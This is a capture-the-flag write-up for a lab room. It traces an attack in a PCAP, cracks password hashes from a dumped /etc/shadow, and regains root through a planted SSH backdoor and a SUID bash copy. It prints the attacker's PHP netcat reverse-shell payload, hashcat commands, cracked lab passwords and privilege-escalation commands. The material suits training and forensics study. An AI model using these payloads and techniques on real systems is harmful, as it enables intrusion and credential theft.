The flags are structured to basically walk us through this room.

Forensics: Analyze the PCAP

I’ve not actually used Wireshark outside of the TryHackMe: Wireshark 101 “room” (and a few short digressions in other rooms), so I’m honestly a little worried about my abilities here…

Filtering the PCAP file for HTTP requests reveals a single POST from 192.168.179.145 to http://192.168.170.159/development/upload.php. A subsequent request from 192.168.179.145 pulls the directory listing of /development/uploads/, and then GETs /development/uploads/payload.php. This suggests that 192.168.179.145 is the “attacker” and 192.168.179.145 is the target system.

We can save off this POST request to get at the uploaded payload.php file, which turns out to have the contents:

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

This is popping a simple reverse shell through netcat that connects back to 192.168.170.145:4242, which would seem to confirm that this was the machine used by the attacker.

This means that penetration occurs when this file is requested in packet 27.

Looking at subsequent TCP packets, we can see what the attacker typed in the packets going from 192.168.170.145 → 192.168.170.159, and the responses in the packets going from 192.168.170.159 → 192.168.170.145. Requests/Responses coming through netcat use the TCP PSH flag, so we can filter by tcp.port == 4242 and tcp.flags.push to zoom in on this conversation.

The attacker eventually issues su james to elevate privileges (packet 71), and a few packets down we can see james’s password.

In packet 112 the attacker cats /etc/shadow, and we get a full dump in packet 114. They then issue git clone https://github.com/NinjaJc01/ssh-backdoor, generate an SSH private key, and switch to the included backdoor binary, at which point we lose the thread.

Returning to packet 114, we can use Copy → Copy Bytes as Printable Text to pull the contents of /etc/shadow (+ a little garbage). After a little cleanup, we have 5 users with passwords (including james, which we know already).

We extract the hashes and then throw Hashcat at this using the suggested “fasttrack” wordlist.

hashcat -m 1800 \
        -O hashes.txt /usr/share/wordlists/fasttrack.txt

Four out of the five passwords turn out to be crackable:

paradox:secuirty3
szymex:abcd123
bee:secret12
muirland:1qaz2wsx

This ironically doesn’t include james!

Research: Analyze the code

It turns out that https://github.com/NinjaJc01/ssh-backdoor is a real thing, with the code itself living in https://github.com/NinjaJc01/ssh-backdoor/blob/master/main.go.

The hashPassword() function here takes the SHA-512 hash of the provided password + the salt. The default has is overridden using the -a flag. We can see that the attacker used this flag when the backdoor was called in packet 3479.

./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

We can use Hashcat to again crack this.

hashcat \
	-m 1710 \
	-O 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05 \
	   ~/.local/share/red-team/wordlists/rockyou.txt

Attack: Get back in!

The last bit of this CTF uses a server, which for this run is at 10.10.114.161. Just visiting that page gives us our first flag.

We’ll get back in using the backdoor that the attacker set up. From the backdoor code we know that the SSH server is running on port 2222, and there don’t seem to be any user checks. So…

env -u SSH_AUTH_SOCK -u SSH_AGENT_PID \
	ssh -p 2222 user@10.10.114.161

…lets us in as expected (with the password we previously cracked).

The user flag is in /home/james/user.txt.

Unfortunately, none of the passwords we cracked earlier work anymore. After checking a couple of possible exploits to get around this, I decided just to see what SUID binaries were on the system (figuring that I’d check them against GTFOBins).

find / -type f -perm -u+s -exec ls -l "{}" \;

This turned up an unusual file — /home/james/.suid_bash. Could this be… an SUID copy of Bash? Indeed it is!

/home/james/.suid_bash -p # Root shell!

The root flag is then in /root/root.txt.

Elapsed Time: 1 h 43 min